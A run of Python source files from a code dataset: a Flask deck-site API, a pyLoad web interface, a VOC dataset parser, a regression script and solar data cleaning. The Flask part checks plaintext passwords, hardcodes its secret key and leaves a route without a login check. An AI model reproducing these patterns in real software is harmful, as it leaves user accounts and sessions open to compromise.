= { 'loggedIn' : ('mod_email' in session) }\n\treturn json_util.dumps(session)\n\n@app.route('/mods/login', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modLogin():\n\t# return json_util.dumps({'test': True})\n data = request.get_json()\n email = data['email']\n password = data['password']\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n deck_coll = db.mods\n obj = deck_coll.find_one({\"email\": email, \"pass\": password})\n ret = { 'success' : False }\n\n if not (obj is None):\n session[\"mod_id\"] = str(obj[\"_id\"])\n ret['success'] = True\n\n return json_util.dumps(ret)\n\n@app.route('/mods/deck//publish', methods=['GET','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef publishDeck(deck_id):\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n\n ret = { 'success' : False }\n #check if mod is allowed to publish\n if(db.decks.find({\"_id\" : ObjectId(deck_id), \"mod\" : ObjectId(session[\"mod_id\"])}).count() == 1):\n db.decks.update({\"_id\" : ObjectId(deck_id)}, {\"$set\" : {\"published\" : True}})\n ret['success'] = True\n return json_util.dumps(ret)\n\n@app.route('/mods/deck/create', methods=['POST','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef createDeck():\n if 'mod_id' not in session:\n return json_util.dumps({'success' : False})\n data = request.get_json()\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n data['mod'] = ObjectId(session['mod_id'])\n data['published'] = False\n data['finished'] = False\n data['created'] = datetime.datetime.utcnow()\n data['edited'] = datetime.datetime.utcnow()\n db.decks.insert(data)\n return json_util.dumps({'success' : True})\n\n@app.route('/mods/deck//save', methods=['POST','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef updateDeck(deck_id):\n if 'mod_id' not in session:\n return json_util.dumps({'success' : False})\n\n data = request.get_json()\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n #check for a valid mod and deck_id\n if(db.decks.find({\"_id\" : ObjectId(deck_id), \"mod\" : ObjectId(session[\"mod_id\"])}).count() != 1):\n return json_util.dumps({'success' : False})\n\n db = client.hearthgg\n data['mod'] = ObjectId(session['mod_id'])\n data['published'] = False\n data['finished'] = False\n data['edited'] = datetime.datetime.utcnow()\n db.decks.update({\"_id\" : ObjectId(deck_id)}, {'$set' : data})\n return json_util.dumps({'success' : True})\n\n\n\n\nif __name__ == \"__main__\":\n\tapp.secret_key = 'PPsccS200djlKK@832a'\n\tapp.run()\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"28659258","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n This program is free software; you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation; either version 3 of the License,\r\n or (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n See the GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program; if not, see .\r\n\r\n @author: RaNaN\r\n\"\"\"\r\n\r\nimport sys\r\nimport module.common.pylgettext as gettext\r\n\r\nimport os\r\nfrom os.path import join, abspath, dirname, exists\r\nfrom os import makedirs\r\n\r\nPROJECT_DIR = abspath(dirname(__file__))\r\nPYLOAD_DIR = abspath(join(PROJECT_DIR, \"..\", \"..\"))\r\n\r\nsys.path.append(PYLOAD_DIR)\r\n\r\nfrom module import InitHomeDir\r\nfrom module.utils import format_size\r\n\r\nimport bottle\r\nfrom bottle import run, app\r\n\r\nfrom jinja2 import Environment, FileSystemLoader, PrefixLoader, FileSystemBytecodeCache\r\nfrom middlewares import StripPathMiddleware, GZipMiddleWare, PrefixMiddleware\r\n\r\nSETUP = None\r\nPYLOAD = None\r\n\r\nfrom module.web import ServerThread\r\n\r\nif not ServerThread.core:\r\n if ServerThread.setup:\r\n SETUP = ServerThread.setup\r\n config = SETUP.config\r\n else:\r\n raise Exception(\"Could not access pyLoad Core\")\r\nelse:\r\n PYLOAD = ServerThread.core.api\r\n config = ServerThread.core.config\r\n\r\nfrom module.common.JsEngine import JsEngine\r\n\r\nJS = JsEngine()\r\n\r\nTEMPLATE = config.get('webinterface', 'template')\r\nDL_ROOT = config.get('general', 'download_folder')\r\nLOG_ROOT = config.get('log', 'log_folder')\r\nPREFIX = config.get('webinterface', 'prefix')\r\n\r\nif PREFIX:\r\n PREFIX = PREFIX.rstrip(\"/\")\r\n if PREFIX and not PREFIX.startswith(\"/\"):\r\n PREFIX = \"/\" + PREFIX\r\n\r\nDEBUG = config.get(\"general\", \"debug_mode\") or \"-d\" in sys.argv or \"--debug\" in sys.argv\r\nbottle.debug(DEBUG)\r\n\r\ncache = join(\"tmp\", \"jinja_cache\")\r\nif not exists(cache):\r\n makedirs(cache)\r\n\r\nbcc = FileSystemBytecodeCache(cache, '%s.cache')\r\nloader = PrefixLoader({\r\n \"default\": FileSystemLoader(join(PROJECT_DIR, \"templates\", \"default\")),\r\n \"mobile\": FileSystemLoader(join(PROJECT_DIR, \"templates\", \"mobile\")),\r\n 'js': FileSystemLoader(join(PROJECT_DIR, 'media', 'js'))\r\n})\r\n\r\nenv = Environment(loader=loader, extensions=['jinja2.ext.i18n', 'jinja2.ext.autoescape'], trim_blocks=True, auto_reload=True,\r\n bytecode_cache=bcc)\r\n\r\n# Filter\r\n\r\nenv.filters[\"type\"] = lambda x: str(type(x))\r\nenv.filters[\"formatsize\"] = format_size\r\nenv.filters[\"getitem\"] = lambda x, y: x.__getitem__(y)\r\nif not PREFIX:\r\n env.filters[\"url\"] = lambda x: x\r\nelse:\r\n env.filters[\"url\"] = lambda x: PREFIX + x if x.startswith(\"/\") else x\r\n\r\n# Locale\r\n\r\ngettext.setpaths([join(os.sep, \"usr\", \"share\", \"pyload\", \"locale\"), None])\r\ntranslation = gettext.translation(\"django\", join(PYLOAD_DIR, \"locale\"),\r\n languages=[config.get(\"general\", \"language\"), \"en\"],fallback=True)\r\ntranslation.install(True)\r\nenv.install_gettext_translations(translation)\r\n\r\n# Middlewares\r\n\r\nfrom beaker.middleware import SessionMiddleware\r\n\r\nsession_opts = {\r\n 'session.type': 'file',\r\n 'session.cookie_expires': False,\r\n 'session.data_dir': './tmp',\r\n 'session.auto': False\r\n}\r\n\r\nweb = StripPathMiddleware(SessionMiddleware(app(), session_opts))\r\nweb = GZipMiddleWare(web)\r\n\r\nif PREFIX:\r\n web = PrefixMiddleware(web, prefix=PREFIX)\r\n\r\nimport pyload_app\r\nimport setup_app\r\nimport cnl_app\r\nimport api_app\r\n\r\n# Server Adapter\r\ndef run_server(host, port, server):\r\n run(app=web, host=host, port=port, quiet=True, server=server)\r\n\r\nif __name__ == \"__main__\":\r\n run(app=web, port=8001)\r\n","sub_path":"cgi-bin/module/web/webinterface.py","file_name":"webinterface.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195285180","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# --------------------------------------------------------\n# @Author : panjq\n# @E-mail : pan_jinquan@163.com\n# @Date : 2020-02-05 11:01:49\n# --------------------------------------------------------\n\"\"\"\nimport os\nimport xmltodict\nimport numpy as np\nimport cv2\nimport glob\nimport random\nimport numbers\nfrom tqdm import tqdm\n\n\nclass Dataset(object):\n \"\"\"\n from torch.utils.data import DataLoader, ConcatDataset\n \"\"\"\n\n def __init__(self, **kwargs):\n self.image_id = []\n\n def __getitem__(self, index):\n raise NotImplementedError\n\n def __add__(self, other):\n return ConcatDataset([self, other])\n\n def __len__(self):\n raise NotImplementedError\n\n @staticmethod\n def read_files(filename, *args):\n \"\"\"\n :param filename:\n :return:\n \"\"\"\n image_id = []\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n line = line.rstrip().split(\" \")[0]\n image_id.append(line.rstrip())\n return image_id\n\n\nclass VOCDataset(Dataset):\n\n def __init__(self,\n filename=None,\n data_root=None,\n anno_dir=None,\n image_dir=None,\n class_names=None,\n transform=None,\n target_transform=None,\n color_space=\"RGB\",\n keep_difficult=False,\n shuffle=False,\n check=False):\n \"\"\"\n :param filename:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :param transform:\n :param target_transform:\n :param color_space:\n :param keep_difficult:\n :param shuffle:\n \"\"\"\n super(VOCDataset, self).__init__()\n self.class_names, self.class_dict = self.parser_classes(class_names)\n parser = self.parser_paths(filename, data_root, anno_dir, image_dir)\n self.data_root, self.anno_dir, self.image_dir, self.image_id = parser\n self.postfix = self.get_image_postfix(self.image_dir, self.image_id)\n self.transform = transform\n self.target_transform = target_transform\n self.color_space = color_space\n self.keep_difficult = keep_difficult\n if check:\n self.image_id = self.checking(self.image_id)\n if shuffle:\n random.seed(200)\n random.shuffle(self.image_id)\n self.num_images = len(self.image_id)\n self.classes = list(self.class_dict.values())\n self.num_classes = max(list(self.class_dict.values())) + 1 if self.class_dict else None\n print(\"class_dict:{}\".format(self.class_dict))\n print(\"image id:{}\".format(len(self.image_id)))\n\n def get_image_postfix(self, image_dir, image_id):\n \"\"\"\n 获得图像文件后缀名\n :param image_dir:\n :return:\n \"\"\"\n if \".\" in image_id[0]:\n postfix = \"\"\n else:\n image_list = glob.glob(os.path.join(image_dir, \"*\"))\n postfix = os.path.basename(image_list[0]).split(\".\")[1]\n return postfix\n\n def __get_image_anno_file(self, image_dir, anno_dir, image_id: str, img_postfix):\n \"\"\"\n :param image_dir:\n :param anno_dir:\n :param image_id:\n :param img_postfix:\n :return:\n \"\"\"\n if not img_postfix and \".\" in image_id:\n image_id, img_postfix = image_id.split(\".\")\n image_file = os.path.join(image_dir, \"{}.{}\".format(image_id, img_postfix))\n annotation_file = os.path.join(anno_dir, \"{}.xml\".format(image_id))\n return image_file, annotation_file\n\n def checking(self, image_ids: list, ignore_empty=True):\n \"\"\"\n :param image_ids:\n :param ignore_empty : 是否去除一些空数据\n :return:\n \"\"\"\n dst_ids = []\n # image_ids = image_ids[:100]\n # image_ids = image_ids[100:]\n for image_id in tqdm(image_ids):\n image_file, annotation_file = self.get_image_anno_file(image_id)\n if not os.path.exists(annotation_file):\n continue\n if not os.path.exists(image_file):\n continue\n bboxes, labels, is_difficult = self.get_annotation(annotation_file)\n if not self.keep_difficult:\n bboxes = bboxes[is_difficult == 0]\n # labels = labels[is_difficult == 0]\n if ignore_empty and (len(bboxes) == 0 or len(labels) == 0):\n print(\"empty annotation:{}\".format(annotation_file))\n continue\n dst_ids.append(image_id)\n print(\"have nums image:{},legal image:{}\".format(len(image_ids), len(dst_ids)))\n return dst_ids\n\n def parser_classes(self, class_names):\n \"\"\"\n class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n :param class_names:\n str : class file\n list: [\"face\",\"person\"]\n dict: 可以自定义label的id{'BACKGROUND': 0, 'person': 1, 'person_up': 1, 'person_down': 1}\n :return:\n \"\"\"\n if isinstance(class_names, str):\n class_names = super().read_files(class_names)\n if isinstance(class_names, list):\n class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n elif isinstance(class_names, dict):\n class_dict = class_names\n else:\n class_dict = None\n return class_names, class_dict\n\n def parser_paths(self, filenames=None, data_root=None, anno_dir=None, image_dir=None):\n \"\"\"\n :param filenames:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :return:\n \"\"\"\n if isinstance(data_root, str):\n anno_dir = os.path.join(data_root, \"Annotations\") if not anno_dir else anno_dir\n image_dir = os.path.join(data_root, \"JPEGImages\") if not image_dir else image_dir\n if isinstance(filenames, str):\n data_root = os.path.dirname(filenames)\n image_id = self.read_files(filenames, anno_dir)\n if not anno_dir:\n anno_dir = os.path.join(data_root, \"Annotations\")\n if not image_dir:\n image_dir = os.path.join(data_root, \"JPEGImages\")\n return data_root, anno_dir, image_dir, image_id\n\n def crop_image(self, image, bbox):\n \"\"\"\n :param image:\n :param bbox:\n :return:\n \"\"\"\n # bboxes = image_processing.extend_bboxes([bbox], scale=[1.5, 1.5])\n # bboxes = image_processing.extend_bboxes([bbox], scale=[1.2, 1.2])\n bboxes = image_processing.extend_bboxes([bbox], scale=[1.3, 1.3])\n images = image_processing.get_bboxes_crop_padding(image, bboxes)\n return images, bboxes\n\n def convert_target(self, boxes, labels):\n annotations = []\n for i in range(len(boxes)):\n bbox = boxes[i, :].tolist()\n label = labels[i].tolist()\n anno = list()\n anno += bbox\n anno += [label]\n assert len(anno) == 5\n annotations.append(anno)\n target = np.array(annotations)\n return target\n\n def __getitem__(self, index):\n \"\"\"\n :param index: int or str\n :return:rgb_image\n \"\"\"\n image_id = self.index2id(index)\n image_file, annotation_file = self.get_image_anno_file(image_id)\n # print(image_file)\n bboxes, labels, is_difficult = self.get_annotation(annotation_file)\n image = self.read_image(image_file, color_space=self.color_space)\n if not self.keep_difficult:\n index = is_difficult == 0\n bboxes = bboxes[index]\n labels = labels[index]\n # landms = landms[index]\n if self.transform:\n image, bboxes, labels = self.transform(image, bboxes, labels)\n num_boxes = len(bboxes)\n if self.target_transform:\n bboxes, labels = self.target_transform(bboxes, labels) # torch.Size([29952, 4]),torch.Size([29952])\n\n target = self.convert_target(bboxes, labels)\n if num_boxes == 0:\n index = int(random.uniform(0, len(self)))\n return self.__getitem__(index)\n # return image, bboxes, labels\n return image, target\n\n def get_image_anno_file(self, index):\n \"\"\"\n :param index:\n :return:\n \"\"\"\n image_id = self.index2id(index)\n image_file, annotation_file = self.__get_image_anno_file(self.image_dir, self.anno_dir, image_id, self.postfix)\n return image_file, annotation_file\n\n def index2id(self, index):\n \"\"\"\n :param index: int or str\n :return:\n \"\"\"\n if isinstance(index, numbers.Number):\n image_id = self.image_id[index]\n else:\n image_id = index\n return image_id\n\n def __len__(self):\n return len(self.image_id)\n\n def check_bbox(self, width, height, bbox):\n xmin, ymin, xmax, ymax = bbox\n sw = (xmax - xmin) / width\n sh = (ymax - ymin) / height\n ok = True\n if sw < 0 or sw > 1:\n ok = False\n elif sh < 0 or sh > 1:\n ok = False\n return ok\n\n def get_annotation(self, xml_file):\n \"\"\"\n :param xml_file:\n :param class_dict: class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n :return:\n \"\"\"\n try:\n content = self.read_xml2json(xml_file)\n annotation = content[\"annotation\"]\n # get image shape\n width = int(annotation[\"size\"][\"width\"])\n height = int(annotation[\"size\"][\"height\"])\n depth = int(annotation[\"size\"][\"depth\"])\n filename = annotation[\"filename\"]\n objects = annotation[\"object\"]\n except Exception as e:\n print(\"illegal annotation:{}\".format(xml_file))\n objects = []\n objects_list = []\n if not isinstance(objects, list):\n objects = [objects]\n for object in objects:\n name = str(object[\"name\"]).lower()\n if self.class_names and name not in self.class_names:\n continue\n difficult = int(object[\"difficult\"])\n xmin = float(object[\"bndbox\"][\"xmin\"])\n xmax = float(object[\"bndbox\"][\"xmax\"])\n ymin = float(object[\"bndbox\"][\"ymin\"])\n ymax = float(object[\"bndbox\"][\"ymax\"])\n # rect = [xmin, ymin, xmax - xmin, ymax - ymin]\n bbox = [xmin, ymin, xmax, ymax]\n if not self.check_bbox(width, height, bbox):\n # print(\"illegal bbox:{}\".format(xml_file))\n continue\n item = {}\n item[\"bbox\"] = bbox\n item[\"difficult\"] = difficult\n if self.class_dict:\n name = self.class_dict[name]\n item[\"name\"] = name\n objects_list.append(item)\n bboxes, labels, is_difficult = self.get_objects_items(objects_list)\n return bboxes, labels, is_difficult\n\n def get_objects_items(self, objects_list):\n \"\"\"\n :param objects_list:\n :return:\n \"\"\"\n bboxes = []\n labels = []\n is_difficult = []\n for item in objects_list:\n bboxes.append(item[\"bbox\"])\n labels.append(item['name'])\n is_difficult.append(item['difficult'])\n bboxes = np.array(bboxes, dtype=np.float32)\n labels = np.array(labels) # for string\n # labels = np.array(labels, dtype=np.int64) # for int64\n # labels = np.asarray(labels).reshape(-1, 1)\n is_difficult = np.array(is_difficult, dtype=np.uint8)\n return bboxes, labels, is_difficult\n\n @staticmethod\n def read_files(filename, *args):\n \"\"\"\n :param filename:\n :return:\n \"\"\"\n if not filename: # if None\n assert args\n anno_list = []\n for a in args:\n anno_list += file_processing.get_files(a, postfix=[\"*.xml\"])\n image_id = VOCDataset.get_files_id(anno_list)\n elif isinstance(filename, list):\n image_id = filename\n elif isinstance(filename, str):\n # image_id = super().read_files(filename)\n image_id = Dataset.read_files(filename)\n else:\n image_id = None\n assert Exception(\"Error:{}\".format(filename))\n return image_id\n\n @staticmethod\n def get_files_id(file_list):\n \"\"\"\n :param file_list:\n :return:\n \"\"\"\n image_idx = []\n for path in file_list:\n basename = os.path.basename(path)\n id = basename.split(\".\")[0]\n image_idx.append(id)\n return image_idx\n\n @staticmethod\n def read_xml2json(xml_file):\n \"\"\"\n import xmltodict\n :param xml_file:\n :return:\n \"\"\"\n with open(xml_file, encoding='utf-8') as fd: # 将XML文件装载到dict里面\n content = xmltodict.parse(fd.read())\n return content\n\n def read_image(self, image_file, color_space=\"RGB\"):\n \"\"\"\n :param image_file:\n :param color_space:\n :return:\n \"\"\"\n image = cv2.imread(str(image_file))\n if color_space.lower() == \"rgb\":\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\nclass ConcatDataset(Dataset):\n \"\"\" Concat Dataset \"\"\"\n\n def __init__(self, datasets, shuffle=False):\n \"\"\"\n import torch.utils.data as torch_utils\n voc1 = PolygonParser(filename1)\n voc2 = PolygonParser(filename2)\n voc=torch_utils.ConcatDataset([voc1, voc2])\n ====================================\n :param datasets:\n :param shuffle:\n \"\"\"\n super(ConcatDataset, self).__init__()\n assert len(datasets) > 0, 'dataset should not be an empty iterable'\n # super(ConcatDataset, self).__init__()\n if not isinstance(datasets, list):\n datasets = [datasets]\n self.image_id = []\n self.dataset = datasets\n self.shuffle = shuffle\n for dataset_id, dataset in enumerate(self.dataset):\n image_id = dataset.image_id\n image_id = self.add_dataset_id(image_id, dataset_id)\n self.image_id += image_id\n self.classes = dataset.classes\n if shuffle:\n random.seed(200)\n random.shuffle(self.image_id)\n\n def add_dataset_id(self, image_id, dataset_id):\n \"\"\"\n :param image_id:\n :param dataset_id:\n :return:\n \"\"\"\n out_image_id = []\n for id in image_id:\n out_image_id.append({\"dataset_id\": dataset_id, \"image_id\": id})\n return out_image_id\n\n def __getitem__(self, index):\n \"\"\"\n :param index: int\n :return:\n \"\"\"\n dataset_id = self.image_id[index][\"dataset_id\"]\n image_id = self.image_id[index][\"image_id\"]\n dataset = self.dataset[dataset_id]\n # print(dataset.data_root, image_id)\n data = dataset.__getitem__(image_id)\n return data\n\n def get_image_anno_file(self, index):\n dataset_id = index[\"dataset_id\"]\n image_id = index[\"image_id\"]\n return self.dataset[dataset_id].get_image_anno_file(image_id)\n\n def get_annotation(self, xml_file):\n return self.dataset[0].get_annotation(xml_file)\n\n def __len__(self):\n return len(self.image_id)\n\n\ndef VOCDatasets(filenames=None,\n data_root=None,\n anno_dir=None,\n image_dir=None,\n class_names=None,\n transform=None,\n color_space=\"RGB\",\n keep_difficult=False,\n shuffle=False,\n check=False):\n \"\"\"\n :param filenames:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :param class_names:\n :param transform:\n :param color_space:\n :param keep_difficult:\n :param shuffle:\n :param check:\n :return:\n \"\"\"\n if not isinstance(filenames, list) and os.path.isfile(filenames):\n filenames = [filenames]\n datas = []\n for filename in filenames:\n data = VOCDataset(filename=filename,\n data_root=data_root,\n anno_dir=anno_dir,\n image_dir=image_dir,\n class_names=class_names,\n transform=transform,\n color_space=color_space,\n keep_difficult=keep_difficult,\n shuffle=shuffle,\n check=check)\n datas.append(data)\n voc = ConcatDataset(datas, shuffle=shuffle)\n return voc\n\n\ndef show_boxes_image(image, bboxes, labels, normal=False, transpose=False):\n \"\"\"\n :param image:\n :param targets_t:\n bboxes = targets[idx][:, :4].data\n keypoints = targets[idx][:, 4:14].data\n labels = targets[idx][:, -1].data\n :return:\n \"\"\"\n import numpy as np\n from utils import image_processing\n image = np.asarray(image)\n bboxes = np.asarray(bboxes)\n labels = np.asarray(labels)\n print(\"image:{}\".format(image.shape))\n print(\"bboxes:{}\".format(bboxes))\n print(\"labels:{}\".format(labels))\n if transpose:\n image = image_processing.untranspose(image)\n h, w, _ = image.shape\n landms_scale = np.asarray([w, h] * 5)\n bboxes_scale = np.asarray([w, h] * 2)\n if normal:\n bboxes = bboxes * bboxes_scale\n # tmp_image = image_processing.untranspose(tmp_image)\n image = image_processing.draw_image_bboxes_text(image, bboxes, labels)\n image_processing.cv_show_image(\"image\", image, waitKey=0)\n print(\"===\" * 10)\n\n\nif __name__ == \"__main__\":\n from utils import image_processing, file_processing\n from models.transforms import data_transforms\n\n # from models.transforms import data_transforms\n\n isshow = True\n # data_root = \"/home/dm/panjinquan3/dataset/MPII/\"\n # data_root = \"/media/dm/dm2/git/python-learning-notes/dataset/Test_Voc\"\n # anno_dir = '/home/dm/panjinquan3/dataset/finger/finger/Annotations'\n # image_dir = '/home/dm/panjinquan3/dataset/finger/finger/JPEGImages'\n # data_root = \"/home/dm/panjinquan3/dataset/Character/gimage_v1/\"\n # data_root = \"/home/dm/panjinquan3/dataset/finger/finger_v5/\"\n # data_root = '/home/dm/panjinquan3/dataset/Character/gimage_v1/'\n # data_root = \"/home/dm/data3/dataset/face_person/SMTC/\"\n # data_root = \"/home/dm/data3/dataset/face_person/MPII/\"\n # data_root = \"/home/dm/data3/dataset/face_person/COCO/VOC/\"\n data_root = \"/home/dm/data3/dataset/card_datasets/yolo_det/CardData4det/\"\n image_dir = data_root + \"JPEGImages\"\n anno_dir = data_root + \"Annotations\"\n filenames = data_root + \"trainval.txt\"\n # class_names = [\"face\", \"person\"]\n # class_names = [\"person\"]\n class_names = [\"card\",\"1\"]\n # class_names = [\"1\"]\n # anno_dir = data_root + '/Annotations'\n shuffle = False\n # class_names = [\"face\", \"person\"]\n # class_names = None\n # class_names = {\"circle\": 0, \"hook\": 1, \"slash\": 2, \"underline\": 3}\n # anno_list = file_processing.get_files_list(anno_dir, postfix=[\"*.xml\"])\n # image_id_list = file_processing.get_files_id(anno_list)\n size = [480, 480]\n # transform = data_transforms.TrainAugmentation(size, mean=0.0, std=1.0)\n # transform = data_transforms.TrainTransform(size, mean=0.0, std=1.0, norm=True)\n # transform = data_transforms.DemoTransform(size, mean=0.0, std=1.0, norm=True)\n transform = data_transforms.TrainTransform(size, mean=0.0, std=1.0, norm=True)\n voc = VOCDataset(filename=filenames,\n data_root=None,\n anno_dir=anno_dir,\n image_dir=image_dir,\n class_names=class_names,\n transform=transform,\n check=True)\n voc = ConcatDataset([voc, voc])\n # voc = torch_utils.ConcatDataset([voc, voc])\n print(\"have num:{}\".format(len(voc)))\n for i in range(len(voc)):\n print(i)\n image, target = voc.__getitem__(i)\n bboxes, labels = target[:, 0:4], target[:, 4:5]\n show_boxes_image(image, bboxes, labels, normal=True, transpose=True)\n","sub_path":"models/dataloader/parser_voc.py","file_name":"parser_voc.py","file_ext":"py","file_size_in_byte":20391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"101114862","text":"#!/usr/bin/env python \n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import preprocessing\n\ndata = pd.read_csv(\"clean_data.csv\",sep=\",\",index_col=None, prefix=None,skip_blank_lines=True,header=0)\n\nX = data.loc[:,[\"Quartier\",\"Commune\",\"Etage\",\"Superficie\",\"Piece\",\"Electricite\" , \"Gaz\" , \"Eau\" , \"Acte notarie\",\"Jardin\" , \"Livret foncier\", \"Meuble\", \"Garage\"]].values\nY = data.loc[:,\"Prix\"].values\n\nX = pd.DataFrame(X)\n\n\nle = preprocessing.LabelEncoder()\nX = X.apply(le.fit_transform)\n\n\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2)\n\nregressor = RandomForestRegressor(max_depth=4, random_state=0)\nregressor.fit(X_train,Y_train)\nscore = regressor.score(X_test,Y_test)\nprint(score)","sub_path":"Regressors/RandomForestRegressor.py","file_name":"RandomForestRegressor.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160735318","text":"def collatz(n):\n res = [n]\n num = n\n while num > 1:\n num = (num // 2) if num % 2 == 0 else (3 * num + 1)\n res.append(num) \n return res\n\ndef chain_printer(li):\n print(' -> '.join(str(x) for x in li))\n\nchain_printer(collatz(int(input())))\n","sub_path":"problems-1/a-ushaev/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240674561","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# **********************************************************************************************************************\n# @file lss_cleaning.py\n# @author edward chen\n# @version v 2.0.0\n# @date 2019-01-07\n# @brief\n# **********************************************************************************************************************\n# @attention\n\n# **********************************************************************************************************************\n\"\"\"\n\n'''\n# ======================================================================================================================\n# Import\n# ======================================================================================================================\n'''\nimport datetime as dt\nimport pandas as pd\nimport astral\n\n\n'''\n# ======================================================================================================================\n# User\n# ======================================================================================================================\n'''\n\n'''\n# ======================================================================================================================\n# Variable\n# ======================================================================================================================\n'''\n\n\n'''\n# ======================================================================================================================\n# Class\n# ======================================================================================================================\n'''\nclass Cleaning(object):\n \n \n D_STATION_INFO = {\n \"hami\": {\n \"name\": \"hami\",\n \"latitude\": 42.81855,\n \"longitude\": 93.51538, \n \"timezone\": \"Asia/Harbin\"\n },\n \"daqing\": {\n \"name\": \"daqing\",\n \"latitude\": 46.58758,\n \"longitude\": 125.10307, \n \"timezone\": \"Asia/Harbin\" \n },\n \"pucheng\": {\n \"name\": \"pucheng\",\n \"latitude\": 34.34127,\n \"longitude\": 108.93984, \n \"timezone\": \"Asia/Harbin\" \n } \n } \n\n def __init__(self, path_output):\n self.path_output = path_output\n\n def calc_sunrise_sunset(self, db_name, DT_date):\n db_name = db_name.split('_')[-1]\n location = astral.Location()\n location.name = self.D_STATION_INFO[db_name][\"name\"]\n location.latitude = self.D_STATION_INFO[db_name][\"latitude\"]\n location.longitude = self.D_STATION_INFO[db_name][\"longitude\"]\n location.timezone = self.D_STATION_INFO[db_name][\"timezone\"]\n \n DT_sunrise = location.sun(DT_date)[\"sunrise\"]\n DT_sunset = location.sun(DT_date)[\"sunset\"]\n \n DT_sunrise = dt.datetime.combine(DT_sunrise.date(), DT_sunrise.time())\n DT_sunset = dt.datetime.combine(DT_sunset.date(), DT_sunset.time())\n \n return DT_sunrise, DT_sunset\n \n def get_meteo_data_from_csv(self, path_input, csv_file):\n PD_D_fd = pd.read_csv(path_input + csv_file, index_col = \"DateTime\")\n \n return PD_D_fd\n \n def app_meteo_data_cleaning(self, db_name, PD_D_meteo_data, noisy_threshold=10, threshold=1, save_csv=False):\n # get meteo data\n PD_D_meteo_fd = PD_D_meteo_data.copy().fillna(0)\n \n DT_1_minute = dt.timedelta(minutes=1) \n station_name = db_name.split('_')[-1]\n \n if \"meteo_01__direct_radiation\" in PD_D_meteo_fd.columns:\n del PD_D_meteo_fd[\"meteo_01__direct_radiation\"]\n if \"meteo_01__scattered_radiation\" in PD_D_meteo_fd.columns:\n del PD_D_meteo_fd[\"meteo_01__scattered_radiation\"]\n #\n PD_D_meteo_fd = PD_D_meteo_fd - noisy_threshold\n \n PD_D_meteo_fd[PD_D_meteo_fd.values < 0] = 0 \n # \n PD_D_meteo_fd.index = pd.to_datetime(PD_D_meteo_fd.index)\n DT_start_date = PD_D_meteo_fd.index[0].date()\n DT_end_date = PD_D_meteo_fd.index[-1].date()\n year = str(DT_start_date.year).zfill(4)\n month = str(DT_start_date.month).zfill(2)\n\n D_rad_daily_src = {}\n D_rad_daily_proc = {} \n D_sun_info = {}\n for i in range((DT_end_date - DT_start_date).days + 1):\n # get current date\n DT_current_date = DT_start_date + dt.timedelta(i)\n current_date = dt.date.strftime(DT_current_date, \"%Y-%m-%d\")\n DT_start_datetime = PD_D_meteo_fd[current_date].index[0]\n DT_end_datetime = PD_D_meteo_fd[current_date].index[-1]\n # calculate the sunrise time and sunset time\n DT_sunrise, DT_sunset = self.calc_sunrise_sunset(db_name, DT_current_date) \n DT_sunrise = DT_sunrise.replace(second=0) \n DT_sunset = DT_sunset.replace(second=0) \n D_sun_info[DT_current_date] = {\"sunrise\": DT_sunrise.time(), \"sunset\": DT_sunset.time()}\n # \n PD_D_meteo_fd.loc[DT_start_datetime:(DT_sunrise-DT_1_minute)] = 0\n PD_D_meteo_fd.loc[(DT_sunset+DT_1_minute):DT_end_datetime] = 0\n #\n D_rad_daily_src[current_date] = PD_D_meteo_fd[current_date].sum()\n #\n for DT_datetime in PD_D_meteo_fd.loc[(DT_sunrise+DT_1_minute):(DT_sunset-DT_1_minute)].index:\n if int(PD_D_meteo_fd.loc[DT_datetime]) == 0:\n DT_datetime_before = DT_datetime - DT_1_minute\n DT_datetime_after = DT_datetime + DT_1_minute\n PD_D_meteo_fd.loc[DT_datetime] = (\n PD_D_meteo_fd.loc[DT_datetime_before] + \n PD_D_meteo_fd.loc[DT_datetime_after]\n )/2\n # \n D_rad_daily_proc[current_date] = PD_D_meteo_fd[current_date].sum()\n \n PD_D_rad_daily_src = pd.DataFrame(D_rad_daily_src).T\n PD_D_rad_daily_proc = pd.DataFrame(D_rad_daily_proc).T\n\n # \n PD_D_meteo_fd[PD_D_meteo_fd.values <= threshold] = 0\n #\n PD_D_sun_info = pd.DataFrame(D_sun_info).T\n \n PD_D_meteo_for_simulation = 